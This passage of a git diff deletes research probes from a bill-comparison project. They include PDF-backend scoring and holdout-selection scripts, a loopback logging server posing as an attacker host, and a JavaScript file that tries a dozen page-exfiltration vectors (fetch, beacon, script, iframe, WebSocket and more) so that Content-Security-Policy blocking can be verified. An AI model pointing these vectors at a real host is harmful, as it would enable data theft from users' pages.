timings[f"{side}_extract_s"] = round(time.perf_counter() - t0, 3) - pages[side], _diag = reconstruct(raw, repaired=(mode == "repaired")) - - # Apply the SAME guard production applies. `compare/pdf.py` declines an unnumbered - # (enrolled) layout with UnsupportedLayoutError before diffing, because every anchor - # path gates on a printed line number, so an enrolled bill collapses into one - # anchorless block and the diff returns a confident wrong answer rather than failing. - # - # Calling `diff_pdfs` directly bypasses that guard, and this harness originally did. - # The result was exactly the failure the guard exists to prevent: on 118-hr-4366/5->6 - # the PDF side reported 3468 amount entries against the XML's 0, and on - # 115-hr-5895/4->5 it matched only 47 of 164. Both pairs end in an enrolled bill. - # Scoring a backend on a document the product declines measures nothing about the - # backend, so those pairs are marked declined rather than silently scored. - declined = [side for side in ("v1", "v2") if _is_unnumbered_layout(pages[side])] - if declined: - raise UnsupportedLayoutError( - f"unnumbered (enrolled) layout on {'+'.join(declined)}; production declines this pair" - ) - - t0 = time.perf_counter() - diff = diff_pdfs(pages["v1"], pages["v2"]) - timings["diff_s"] = round(time.perf_counter() - t0, 3) - - text_v1, off_v1 = pdf_full_text(pages["v1"]) - text_v2, off_v2 = pdf_full_text(pages["v2"]) - canonical = pdf_diff_to_canonical( - diff, - bill_type=chamber, - bill_number=number, - congress=congress, - full_text={"v1": text_v1, "v2": text_v2}, - line_offsets={"v1": off_v1, "v2": off_v2}, - ) - return canonical, timings - - -def corpus_pairs() -> list[tuple[str, int, int, Path, Path, Path, Path]]: - """Consecutive version pairs carrying both formats on both sides (ADR 0015).""" - out = [] - for d in sorted((REPO / "tests" / "corpus").iterdir()): - if not d.is_dir(): - continue - stems: dict[int, dict[str, Path]] = {} - for f in d.iterdir(): - m = re.match(r"(\d+)_([a-z-]+)\.(pdf|xml)$", f.name) - if m: - stems.setdefault(int(m.group(1)), {})[m.group(3)] = f - both = sorted(n for n, formats in stems.items() if {"pdf", "xml"} <= formats.keys()) - for a, b in zip(both, both[1:]): - if b == a + 1: - out.append((d.name, a, b, stems[a]["pdf"], stems[b]["pdf"], stems[a]["xml"], stems[b]["xml"])) - return out - - -def compare(pdf_canon: dict, xml_canon: dict) -> dict: - pdf_amounts, xml_amounts = amount_triples(pdf_canon), amount_triples(xml_canon) - pdf_sigs, xml_sigs = change_signatures(pdf_canon), change_signatures(xml_canon) - pdf_old, pdf_new = changed_text_tokens(pdf_canon) - xml_old, xml_new = changed_text_tokens(xml_canon) - - only_pdf = pdf_sigs - xml_sigs - only_xml = xml_sigs - pdf_sigs - material = [s for s in (only_pdf + only_xml) if is_material(s)] - - return { - "T1_change_signatures": prf(xml_sigs, pdf_sigs), - "T1b_changed_tokens_old": prf(xml_old, pdf_old), - "T1b_changed_tokens_new": prf(xml_new, pdf_new), - "T2_amount_entries": prf(xml_amounts, pdf_amounts), - "T3_material_disagreements": len(material), - "T3_sample": [{"kind": s[0], "old": s[1][:180], "new": s[2][:180]} for s in material[:8]], - "context": { - "n_changes_pdf": len(pdf_canon.get("changes") or []), - "n_changes_xml": len(xml_canon.get("changes") or []), - "n_amount_entries_pdf": sum(pdf_amounts.values()), - "n_amount_entries_xml": sum(xml_amounts.values()), - }, - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--backends", default=",".join(ALL_BACKENDS)) - ap.add_argument("--modes", default="strict,repaired") - ap.add_argument("--limit-pairs", type=int, default=None) - args = ap.parse_args() - - backends = args.backends.split(",") - if backends[0] != "pdfium-native": - backends = ["pdfium-native"] + [b for b in backends if b != "pdfium-native"] - modes = args.modes.split(",") - - pairs = corpus_pairs() - if args.limit_pairs: - pairs = pairs[: args.limit_pairs] - print(f"{len(pairs)} pairs x {len(backends)} backends x {len(modes)} modes", file=sys.stderr) - - out: dict = {"pairs": {}, "n_pairs": len(pairs), "backends": backends} - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, (bill, a, b, pdf1, pdf2, xml1, xml2) in enumerate(pairs, 1): - key = f"{bill}/{a}->{b}" - out["pairs"][key] = {} - try: - xml_canon = xml_canonical(xml1, xml2) - except Exception as exc: - out["pairs"][key]["_xml_error"] = f"{type(exc).__name__}: {exc}" - print(f" [{i}/{len(pairs)}] {key} XML ERROR {exc}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - continue - - for mode in modes: - incumbent_canon = None - for backend in backends: - slot = f"{backend}/{mode}" - try: - canon, timings = pdf_canonical(backend, pdf1, pdf2, bill, mode) - entry = compare(canon, xml_canon) - entry["timings"] = timings - if backend == "pdfium-native": - incumbent_canon = canon - entry["T4_vs_incumbent"] = None - else: - # T4: hold the whole downstream pipeline fixed, vary only glyphs. - entry["T4_vs_incumbent"] = { - "change_signatures": prf(change_signatures(incumbent_canon), change_signatures(canon)), - "amount_entries": prf(amount_triples(incumbent_canon), amount_triples(canon)), - "identical_changes": change_signatures(incumbent_canon) == change_signatures(canon), - "identical_amounts": amount_triples(incumbent_canon) == amount_triples(canon), - } - out["pairs"][key][slot] = entry - note = ( - f"amtF1={entry['T2_amount_entries']['f1']:.3f} " - f"chgF1={entry['T1_change_signatures']['f1']:.3f} " - f"mat={entry['T3_material_disagreements']}" - ) - if entry["T4_vs_incumbent"]: - note += ( - f" | vs_inc amt={entry['T4_vs_incumbent']['identical_amounts']}" - f" chg={entry['T4_vs_incumbent']['identical_changes']}" - ) - except Exception as exc: - out["pairs"][key][slot] = { - "error": f"{type(exc).__name__}: {exc}", - "traceback": traceback.format_exc()[-1200:], - } - note = "ERROR" - print(f" [{i}/{len(pairs)}] {key:<24} {slot:<24} {note}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_tierb.py b/docs/research/pdf-backend-bakeoff/probes/score_tierb.py deleted file mode 100644 index 64177d9b..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_tierb.py +++ /dev/null @@ -1,132 +0,0 @@ -"""Tier B (partial): robustness on non-canonical documents with NO XML reference. - -WHAT THIS IS, AND WHAT IT IS NOT. The spec's Tier B asks for pre-publication material -- -committee prints, chair's marks, discussion drafts. **The repository contains none, and -this probe does not manufacture any.** What it covers is the nearest available material: - - * `tests/data/CRPT-118srpt198.pdf` a watermarked COMMITTEE REPORT, a genuinely - different document class from a bill - * `tests/data/BILLS-118s4795rs.pdf` a watermarked Senate bill - * `tests/data/subcommittee/*.pdf` nine GPO-published House-reported prints, which - the spec correctly classifies as additional TIER A - print-class variety rather than Tier B - -So this closes the spec's explicit request to include the watermarked Senate document and -the committee report, and it widens print-class coverage. It does NOT close the Tier B -gap, and the results must not be read as if it did. - -THE METRIC. There is no XML for any of these, so PDF-vs-XML is unavailable. The measure -is backend-vs-incumbent through the identical downstream pipeline, which is the same -structure-free instrument Phase 2 calls T4: the entire pipeline is held fixed and only -the glyph source varies, so any difference is attributable to the backend and needs no -adjudication. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_tierb.py \ - --out docs/research/pdf-backend-bakeoff/results/tierb.json -""" - -from __future__ import annotations - -import argparse -import json -import sys -import time -import traceback -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import ALL_BACKENDS, run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 - -from deltatrack.parsers.pdf_anchors import breadcrumb_for, extract_anchors # noqa: E402 - -INCUMBENT = "pdfium-native" - - -def documents() -> list[Path]: - out = [REPO / "tests/data/CRPT-118srpt198.pdf", REPO / "tests/data/BILLS-118s4795rs.pdf"] - out += sorted((REPO / "tests/data/subcommittee").glob("*.pdf")) - return [p for p in out if p.exists()] - - -def profile(pdf: Path, backend: str) -> dict: - t0 = time.perf_counter() - raw, summary = run_backend(backend, pdf) - extract_s = time.perf_counter() - t0 - pages, diag = reconstruct(raw, repaired=True) - anchors = extract_anchors(pages) - return { - "extract_s": round(extract_s, 3), - "n_pages": len(pages), - "reconstruction": diag, - "text": "\n".join(p.text for p in pages), - "line_numbers": sorted( - (p.page_number, ln.line_number) for p in pages for ln in p.print_lines if ln.line_number is not None - ), - "n_anchors": len(anchors), - "anchor_kinds": dict(Counter(a.kind for a in anchors)), - "breadcrumbs": [tuple(breadcrumb_for(a, anchors)) for a in anchors], - "glyphs": summary.get("glyphs"), - "undecodable_glyphs": summary.get("undecodable_glyphs", 0), - } - - -def compare(ref: dict, cand: dict) -> dict: - rl, cl = set(ref["line_numbers"]), set(cand["line_numbers"]) - rb, cb = Counter(ref["breadcrumbs"]), Counter(cand["breadcrumbs"]) - return { - "text_identical": ref["text"] == cand["text"], - "line_numbers_identical": rl == cl, - "line_number_recall": round(len(rl & cl) / len(rl), 5) if rl else None, - "anchors_ref": ref["n_anchors"], - "anchors_cand": cand["n_anchors"], - "breadcrumb_agreement": (round(sum((rb & cb).values()) / sum(rb.values()), 5) if sum(rb.values()) else None), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - args = ap.parse_args() - - docs = documents() - print(f"{len(docs)} non-corpus documents x {len(ALL_BACKENDS)} backends", file=sys.stderr) - out: dict = {"documents": {}, "n_documents": len(docs), "note": __doc__.split("\n\n")[1]} - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, pdf in enumerate(docs, 1): - key = pdf.relative_to(REPO).as_posix() - out["documents"][key] = {} - ref = None - for backend in [INCUMBENT] + [b for b in ALL_BACKENDS if b != INCUMBENT]: - try: - prof = profile(pdf, backend) - if backend == INCUMBENT: - ref = prof - entry = {k: v for k, v in prof.items() if k not in ("text", "line_numbers", "breadcrumbs")} - entry["vs_incumbent"] = None if backend == INCUMBENT else compare(ref, prof) - out["documents"][key][backend] = entry - note = ( - f"pages={prof['n_pages']} anchors={prof['n_anchors']}" - if backend == INCUMBENT - else f"text_identical={entry['vs_incumbent']['text_identical']} " - f"crumbs={entry['vs_incumbent']['breadcrumb_agreement']}" - ) - except Exception as exc: - out["documents"][key][backend] = {"error": f"{type(exc).__name__}: {exc}"} - out["documents"][key][backend]["traceback"] = traceback.format_exc()[-800:] - note = "ERROR" - print(f" [{i}/{len(docs)}] {key:<44} {backend:<14} {note}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/select_holdout.py b/docs/research/pdf-backend-bakeoff/probes/select_holdout.py deleted file mode 100644 index dd3a9a15..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/select_holdout.py +++ /dev/null @@ -1,363 +0,0 @@ -"""Execute the frozen P2 holdout selection procedure. - -PRE-REGISTRATION-CONFIRMATORY.md, "P2 -- holdout corpus". This script implements that -procedure literally and writes results/holdout_membership.json. It does NOT score anything. - -Frame: govinfo BILLSTATUS, Congresses 113-119, all 8 bill types. -Eligible: >= 2 text versions that EACH carry both PDF and XML at content/pkg. -Exclusions: the 30 replication bills; every non-corpus probe fixture; every bill in the - main checkout's bills/ working tree. -Strata: 8, filled in fixed order, one bill each unless stated. -Selection: within a stratum, candidates sorted by bill id, permuted with seed 20260805, - first that satisfies the stratum predicate AND the format rule. -""" - -from __future__ import annotations - -import hashlib -import io -import json -import os -import random -import re -import sys -import xml.etree.ElementTree as ET -import zipfile -from pathlib import Path - -import httpx - -REPO = Path(__file__).resolve().parent.parents[3] -sys.path.insert(0, str(REPO / "tools")) -from fetch_govinfo import order_versions # noqa: E402 - -MAIN = REPO.parents[2] if (REPO.parents[2] / "bills").exists() else REPO -TMP = Path(os.environ["CLAUDE_JOB_DIR"]) / "tmp" -BS = Path(os.environ.get("BAKEOFF_BILLSTATUS", TMP / "billstatus")) -OUT_DIR = REPO / "docs/research/pdf-backend-bakeoff/results" -HOLDOUT_DIR = REPO / "docs/research/pdf-backend-bakeoff/holdout" - -SEED = 20260805 -APPROPS_CODES = {"hsap00", "ssap00"} -CONTENT = "https://www.govinfo.gov/content/pkg" - -# Version codes by class, for the strata that name them. -WATERMARKED_SENATE = {"rs", "pcs"} -AMENDMENT_PRINT = {"eah", "eas"} - - -def bill_id(congress: str, btype: str, number: str) -> str: - return f"{congress}-{btype}-{number}" - - -def pkg_urls(pkg: str) -> tuple[str, str]: - return f"{CONTENT}/{pkg}/xml/{pkg}.xml", f"{CONTENT}/{pkg}/pdf/{pkg}.pdf" - - -_PKG_RE = re.compile(r"/(BILLS-\d+[a-z]+\d+[a-z0-9]+)\.(?:xml|htm|pdf)\b", re.I) -_CODE_RE = re.compile(r"^BILLS-\d+[a-z]+\d+([a-z][a-z0-9]*)$", re.I) - - -def parse_bill(root: ET.Element) -> dict | None: - b = root.find("bill") - if b is None: - return None - congress = (b.findtext("congress") or "").strip() - btype = (b.findtext("type") or "").strip().lower() - number = (b.findtext("billNumber") or b.findtext("number") or "").strip() - if not (congress and btype and number): - return None - - # Committee referral codes back the appropriations facet. The element is - # committees/item (with a legacy committees/billCommittees/item layout); an earlier - # version of this script walked b.iter("committee"), which matches nothing in - # BILLSTATUS and flagged 0 of 108,121 bills as appropriations -- emptying stratum 4 - # and making real scarcity indistinguishable from a parse bug. Use the repo's own - # accessor rather than a second implementation of it. - items = b.findall("committees/item") or b.findall("committees/billCommittees/item") - codes = {(it.findtext("systemCode") or "").strip().lower() for it in items} - codes.discard("") - - versions: list[dict] = [] - tv = b.find("textVersions") - if tv is not None: - for item in tv.findall("item"): - pkg = None - for f in item.iter("item"): - u = (f.findtext("url") or "").strip() - m = _PKG_RE.search(u) - if m: - pkg = m.group(1) - break - if pkg is None: - for u_el in item.iter("url"): - m = _PKG_RE.search((u_el.text or "").strip()) - if m: - pkg = m.group(1) - break - if pkg is None: - continue - m = _CODE_RE.match(pkg) - code = m.group(1).lower() if m else "" - versions.append({"pkg": pkg, "code": code, "date": (item.findtext("date") or "").strip()}) - - # de-dup by package id, then order with the repo's own authority (BILLSTATUS date, - # tier as tie-break) so the holdout numbers versions exactly as the corpus does. - seen, uniq = set(), [] - for v in versions: - if v["pkg"] in seen: - continue - seen.add(v["pkg"]) - uniq.append(v) - by_code = {v["code"]: v for v in uniq if v["code"]} - try: - ordered = order_versions((c, v["date"]) for c, v in by_code.items()) - uniq = [by_code[c] for c, _d, _t in ordered if c in by_code] - except Exception: - pass - - title = (b.findtext("title") or "").strip() - return { - "bill_id": bill_id(congress, btype, number), - "congress": int(congress), - "type": btype, - "number": int(number) if number.isdigit() else number, - "title": title, - "appropriations": bool(codes & APPROPS_CODES), - "versions": uniq, - } - - -def load_frame() -> list[dict]: - bills: list[dict] = [] - zips = sorted(BS.glob("BILLSTATUS-*.zip")) - for z in zips: - try: - zf = zipfile.ZipFile(z) - except zipfile.BadZipFile: - print(f" BAD ZIP {z.name}", file=sys.stderr) - continue - n = 0 - for name in zf.namelist(): - if not name.lower().endswith(".xml"): - continue - try: - rec = parse_bill(ET.parse(io.BytesIO(zf.read(name))).getroot()) - except ET.ParseError: - continue - if rec: - bills.append(rec) - n += 1 - print(f" {z.name}: {n} bills", file=sys.stderr) - return bills - - -def excluded_bill_ids() -> dict[str, list[str]]: - repl = sorted({p.name for p in (REPO / "tests/corpus").iterdir() if p.is_dir()}) - probes = ["118-s-4795"] - for p in sorted((REPO / "tests/data/subcommittee").glob("*.pdf")): - m = re.match(r"BILLS-(\d+)([a-z]+)(\d+)([a-z0-9]+)", p.name) - if m: - probes.append(bill_id(m.group(1), m.group(2), m.group(3))) - main_tree = sorted({p.name for p in MAIN.joinpath("bills").iterdir() if p.is_dir()}) - return { - "replication_corpus": repl, - "non_corpus_probe_fixtures": sorted(set(probes)), - "main_checkout_bills_tree": main_tree, - } - - -def head_ok(client: httpx.Client, url: str) -> bool: - try: - r = client.head(url, follow_redirects=True, timeout=30) - return r.status_code == 200 - except httpx.HTTPError: - return False - - -def dual_format_versions(client: httpx.Client, rec: dict, cache: dict) -> list[dict]: - """Versions whose XML *and* PDF both exist at content/pkg. Verified, not assumed.""" - out = [] - for v in rec["versions"]: - key = v["pkg"] - if key not in cache: - xu, pu = pkg_urls(key) - cache[key] = head_ok(client, xu) and head_ok(client, pu) - if cache[key]: - out.append(v) - return out - - -# ---- strata ------------------------------------------------------------------ - -STRATA = [ - {"id": 1, "name": "non-appropriations House bill, 118th or 119th", "n": 2, - "pred": lambda r: (not r["appropriations"]) and r["type"] == "hr" and r["congress"] in (118, 119)}, - {"id": 2, "name": "non-appropriations Senate bill", "n": 2, - "pred": lambda r: (not r["appropriations"]) and r["type"] == "s"}, - {"id": 3, "name": "joint resolution (hjres/sjres)", "n": 1, - "pred": lambda r: r["type"] in ("hjres", "sjres")}, - {"id": 4, "name": "appropriations bill from 113/114/116/119", "n": 2, - "pred": lambda r: r["appropriations"] and r["congress"] in (113, 114, 116, 119)}, - {"id": 5, "name": "longest version < 20 printed pages", "n": 2, "pages": ("lt", 20), - "pred": lambda r: True}, - {"id": 6, "name": "longest version > 400 printed pages", "n": 1, "pages": ("gt", 400), - "pred": lambda r: True}, - {"id": 7, "name": "watermarked Senate print (rs/pcs)", "n": 1, - "pred": lambda r: r["type"] == "s" and any(v["code"] in WATERMARKED_SENATE for v in r["versions"])}, - {"id": 8, "name": "chamber-crossing amendment print (eah/eas)", "n": 1, - "pred": lambda r: any(v["code"] in AMENDMENT_PRINT for v in r["versions"])}, -] - - -def page_count(path: Path) -> int: - import pypdfium2 as pdfium - - doc = pdfium.PdfDocument(str(path)) - try: - return len(doc) - finally: - doc.close() - - -def download(client: httpx.Client, url: str, dest: Path) -> str: - dest.parent.mkdir(parents=True, exist_ok=True) - r = client.get(url, follow_redirects=True, timeout=300) - r.raise_for_status() - dest.write_bytes(r.content) - return hashlib.sha256(r.content).hexdigest() - - -def main() -> None: - print("loading frame...", file=sys.stderr) - frame = load_frame() - print(f"frame: {len(frame)} bills", file=sys.stderr) - - excl = excluded_bill_ids() - excl_all = set().union(*excl.values()) - eligible_ids = {r["bill_id"] for r in frame} - - # Candidate pool: >= 2 versions carrying a BILLS package (dual-format verified lazily). - pool = [r for r in frame if len(r["versions"]) >= 2 and r["bill_id"] not in excl_all] - print(f"pool (>=2 pkg versions, not excluded): {len(pool)}", file=sys.stderr) - - client = httpx.Client(headers={"User-Agent": "DeltaTrack-bakeoff-holdout/1.0"}) - fmt_cache: dict[str, bool] = {} - chosen: dict[str, dict] = {} - taken: set[str] = set() - strata_report = [] - - for st in STRATA: - cands = sorted([r for r in pool if st["pred"](r) and r["bill_id"] not in taken], - key=lambda r: r["bill_id"]) - rng = random.Random(SEED) - order = list(range(len(cands))) - rng.shuffle(order) - filled, examined = [], 0 - for idx in order: - if len(filled) >= st["n"]: - break - rec = cands[idx] - examined += 1 - dual = dual_format_versions(client, rec, fmt_cache) - if len(dual) < 2: - continue - if "pages" in st: - op, lim = st["pages"] - probe = dual[-1] if op == "gt" else dual[0] - _, pu = pkg_urls(probe["pkg"]) - tmp = HOLDOUT_DIR / "_probe" / f"{probe['pkg']}.pdf" - try: - download(client, pu, tmp) - pc = page_count(tmp) - except Exception as exc: - print(f" probe fail {rec['bill_id']}: {exc}", file=sys.stderr) - continue - if (op == "lt" and not pc < lim) or (op == "gt" and not pc > lim): - continue - rec = {**rec, "_probe_pages": pc} - rec = {**rec, "_dual": dual} - filled.append(rec) - taken.add(rec["bill_id"]) - print(f" stratum {st['id']}: {rec['bill_id']} ({len(dual)} dual-format versions)", file=sys.stderr) - for rec in filled: - chosen[rec["bill_id"]] = {**rec, "stratum": st["id"]} - strata_report.append({ - "stratum": st["id"], "name": st["name"], "target": st["n"], - "filled": [r["bill_id"] for r in filled], "candidates": len(cands), - "examined": examined, - }) - print(f"stratum {st['id']} ({st['name']}): {len(filled)}/{st['n']}", file=sys.stderr) - - # Download every selected bill's dual-format versions. - members = [] - for bid, rec in sorted(chosen.items()): - files = [] - for i, v in enumerate(rec["_dual"], 1): - xu, pu = pkg_urls(v["pkg"]) - xd = HOLDOUT_DIR / bid / f"{i}_{v['code']}.xml" - pd = HOLDOUT_DIR / bid / f"{i}_{v['code']}.pdf" - try: - xs = download(client, xu, xd) - ps = download(client, pu, pd) - except Exception as exc: - print(f" DOWNLOAD FAIL {bid} {v['pkg']}: {exc}", file=sys.stderr) - continue - files.append({ - "index": i, "pkg": v["pkg"], "code": v["code"], "date": v["date"], - "xml": {"path": str(xd.relative_to(HOLDOUT_DIR)), "sha256": xs, "bytes": xd.stat().st_size}, - "pdf": {"path": str(pd.relative_to(HOLDOUT_DIR)), "sha256": ps, "bytes": pd.stat().st_size, - "pages": page_count(pd)}, - }) - members.append({ - "bill_id": bid, "stratum": rec["stratum"], "congress": rec["congress"], - "type": rec["type"], "number": rec["number"], "title": rec["title"], - "appropriations": rec["appropriations"], "versions": files, - }) - print(f" downloaded {bid}: {len(files)} versions", file=sys.stderr) - - filled_strata = sum(1 for s in strata_report if len(s["filled"]) == s["target"]) - adequacy = ("generalization" if filled_strata == 8 - else "sampled-classes-only" if filled_strata >= 5 - else "UNOBTAINABLE -- downgrade to locked-protocol replication") - - doc = { - "protocol": "PRE-REGISTRATION-CONFIRMATORY.md, P2 holdout corpus", - "seed": SEED, - "generation_note": ( - "Generated twice. The first run walked b.iter('committee') for committee " - "referral codes, which matches nothing in BILLSTATUS: 0 of 108,121 bills were " - "flagged appropriations and stratum 4 reported 0 candidates, which reads " - "identically to real scarcity. Corrected to committees/item (the accessor " - "tools/fetch_govinfo.py already had) and regenerated in full, because filling " - "stratum 4 removes its picks from the pools of strata 5-8 that follow it. " - "NOTHING WAS SCORED from the first output and it was never committed; this " - "file is the only membership that has ever existed in git." - ), - "frame": { - "source": "govinfo BILLSTATUS bulk data", - "congresses": [113, 114, 115, 116, 117, 118, 119], - "bill_types": ["hr", "s", "hjres", "sjres", "hconres", "sconres", "hres", "sres"], - "zips": sorted(p.name for p in BS.glob("BILLSTATUS-*.zip")), - "bills_parsed": len(frame), - "pool_after_exclusions": len(pool), - }, - "exclusions": {k: v for k, v in excl.items()}, - "exclusions_total": len(excl_all), - "exclusions_present_in_frame": sorted(excl_all & eligible_ids), - "strata": strata_report, - "strata_fully_filled": filled_strata, - "adequacy": adequacy, - "members": members, - "n_bills": len(members), - "n_documents": sum(len(m["versions"]) for m in members), - } - OUT_DIR.mkdir(parents=True, exist_ok=True) - dest = OUT_DIR / "holdout_membership.json" - dest.write_text(json.dumps(doc, indent=1)) - print(f"\nwrote {dest}", file=sys.stderr) - print(f"strata fully filled: {filled_strata}/8 -> {adequacy}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/serve.py b/docs/research/pdf-backend-bakeoff/probes/serve.py deleted file mode 100644 index 3d8d2878..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/serve.py +++ /dev/null @@ -1,110 +0,0 @@ -"""Logging server standing in for an attacker-controlled host. - -Everything is loopback, so nothing leaves this machine, but from the browser's point of -view it is a different origin than `null`. - -Two listeners, not one. The predecessor probe spoke only HTTP, which meant a WebRTC STUN -attempt could not have appeared in its log *regardless of whether the browser made one* -- -a check structurally incapable of firing, which reads identically to a pass. The UDP -listener closes that: a STUN binding request is a UDP datagram, and any datagram arriving -on the port is recorded. - -Assert on what the SERVER received, never on whether JavaScript threw. Under CSP most -vectors report `attempted` with no exception; they simply produce no request. -""" - -from __future__ import annotations - -import argparse -import http.server -import json -import socket -import socketserver -import threading -import time - -HITS: list[dict] = [] -_LOCK = threading.Lock() - - -def record(kind: str, detail: str) -> None: - with _LOCK: - HITS.append({"kind": kind, "detail": detail, "t": round(time.time(), 3)}) - print(f" EGRESS OBSERVED [{kind}] {detail[:110]}", flush=True) - - -class Handler(http.server.BaseHTTPRequestHandler): - def _log_and_ok(self, verb: str) -> None: - body = b"x" - record("http", f"{verb} {self.path}") - self.send_response(200) - # Permissive CORS so a CORS failure can never be mistaken for the reason a - # request did or did not arrive. CORS gates reading the RESPONSE, not sending - # the REQUEST, and is not an egress control. - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header("Content-Type", "image/gif") - self.send_header("Content-Length", str(len(body))) - self.end_headers() - self.wfile.write(body) - - def do_GET(self) -> None: - self._log_and_ok("GET") - - def do_POST(self) -> None: - self._log_and_ok("POST") - - def do_PUT(self) -> None: - self._log_and_ok("PUT") - - def log_message(self, *_a) -> None: - pass - - -def udp_listener(port: int, stop: threading.Event) -> None: - """Catch STUN (and anything else) on the same port number, over UDP. - - A STUN binding request carries the 0x2112A442 magic cookie at offset 4, which is - enough to label it rather than report a bare datagram. - """ - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - sock.bind(("127.0.0.1", port)) - sock.settimeout(0.5) - while not stop.is_set(): - try: - data, addr = sock.recvfrom(4096) - except (TimeoutError, socket.timeout): - continue - except OSError: - break - label = "stun" if len(data) >= 8 and data[4:8] == b"\x21\x12\xa4\x42" else "udp" - record(label, f"{len(data)} bytes from {addr[0]}:{addr[1]}") - sock.close() - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--port", type=int, default=8973) - ap.add_argument("--seconds", type=float, default=120) - ap.add_argument("--dump", default=None, help="write observed hits as JSON on exit") - args = ap.parse_args() - - stop = threading.Event() - socketserver.TCPServer.allow_reuse_address = True - with socketserver.TCPServer(("127.0.0.1", args.port), Handler) as httpd: - threading.Thread(target=httpd.serve_forever, daemon=True).start() - threading.Thread(target=udp_listener, args=(args.port, stop), daemon=True).start() - print(f"listening on 127.0.0.1:{args.port} (tcp+udp)", flush=True) - try: - time.sleep(args.seconds) - except KeyboardInterrupt: - pass - stop.set() - if args.dump: - with open(args.dump, "w") as fh: - json.dump(HITS, fh, indent=1) - print(f"total hits: {len(HITS)}", flush=True) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/vectors.js b/docs/research/pdf-backend-bakeoff/probes/vectors.js deleted file mode 100644 index 2ecdc2fb..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/vectors.js +++ /dev/null @@ -1,145 +0,0 @@ -// Every exfiltration mechanism a page can attempt, each tagged so the receiving server -// says which ones actually established egress. -// -// CODEQL: this file deliberately trips `js/functionality-from-untrusted-source` twice, at -// the `script` and `iframe` vectors below (alerts #6 and #7 on PR #553, "Script/Iframe -// loaded using unencrypted connection"). Both are the thing under test, not a defect: -// -// - This is attack-vector code. Its entire job is to attempt loading executable content -// from a remote origin, so that `confirm_egress.py` / `redteam_egress2.py` can prove -// Content-Security-Policy blocks it. A vector that could not attempt the load would -// measure nothing, and a probe rewritten to satisfy the rule would silently stop -// testing `script-src` and `frame-src` -- the two directives these vectors exist for. -// - The "untrusted source" is `http://127.0.0.1:8973`, the harness's own logging server -// (`serve.py`, which binds 127.0.0.1 on TCP and UDP). Nothing is fetched from a third -// party and no traffic leaves the machine. -// - Plain HTTP is required, not incidental. The measurement is whether the request is -// issued at all; TLS to a loopback listener would add a certificate to the harness -// without changing what is observed. -// -// None of this ships: the file is a research probe under docs/research/, never imported by -// src/deltatrack, and never served to a user. -// -// The returned string reports what the PAGE saw (attempted / threw). That is diagnostic -// only. The claim is decided by what the SERVER received: under CSP most of these report -// `attempted` with no JavaScript exception and simply produce no request, so a harness -// that checked for thrown errors would report exfiltration as SUCCEEDING. -// -// Vectors the predecessor fixture did not conclusively test, closed here: -// - form submission: it built a form and never called submit(), so the vector was -// listed as covered while never having been fired. It now submits into a hidden -// same-page iframe, which exercises `form-action` without navigating the page away. -// - webrtc: unchanged here, but the logging server now also listens on UDP, so a STUN -// binding request can be observed at all. Previously it could not have been. -// - service-worker registration, worker-originated fetch, @import and webfont loads. -window.__tryAll = async function (tag) { - const U = (v) => `http://127.0.0.1:8973/${tag}-${v}?secret=BILLTEXT`; - const out = []; - const t = async (name, fn) => { - try { - await fn(); - out.push(name + ":attempted"); - } catch (e) { - out.push(name + ":threw(" + e.name + ")"); - } - }; - - await t("fetch", () => fetch(U("fetch"), { mode: "no-cors" })); - await t("xhr", () => { - const x = new XMLHttpRequest(); - x.open("GET", U("xhr")); - x.send(); - }); - await t("beacon", () => { - navigator.sendBeacon(U("beacon"), "data"); - }); - await t("img", () => { - const i = new Image(); - i.src = U("img"); - document.body.appendChild(i); - }); - // CodeQL js/functionality-from-untrusted-source (alert #6): intentional. Exercises - // CSP `script-src` against the loopback listener; see the header note. - await t("script", () => { - const s = document.createElement("script"); - s.src = U("script"); - document.body.appendChild(s); - }); - await t("css", () => { - const l = document.createElement("link"); - l.rel = "stylesheet"; - l.href = U("css"); - document.head.appendChild(l); - }); - await t("cssimport", () => { - const s = document.createElement("style"); - s.textContent = `@import url("${U("cssimport")}");`; - document.head.appendChild(s); - }); - await t("webfont", () => { - const s = document.createElement("style"); - s.textContent = `@font-face{font-family:XEg;src:url("${U("webfont")}")} .fx{font-family:XEg}`; - document.head.appendChild(s); - const d = document.createElement("div"); - d.className = "fx"; - d.textContent = "force the font to load"; - document.body.appendChild(d); - }); - await t("websocket", () => { - new WebSocket("ws://127.0.0.1:8973/" + tag + "-ws"); - }); - await t("eventsrc", () => { - new EventSource(U("eventsource")); - }); - // CodeQL js/functionality-from-untrusted-source (alert #7): intentional. Exercises - // CSP `frame-src` against the loopback listener; see the header note. - await t("iframe", () => { - const f = document.createElement("iframe"); - f.src = U("iframe"); - document.body.appendChild(f); - }); - await t("dynimport", () => import(U("dynimport"))); - - // FORM SUBMISSION -- actually submitted, into a hidden iframe so `form-action` is - // exercised without navigating this page away. - await 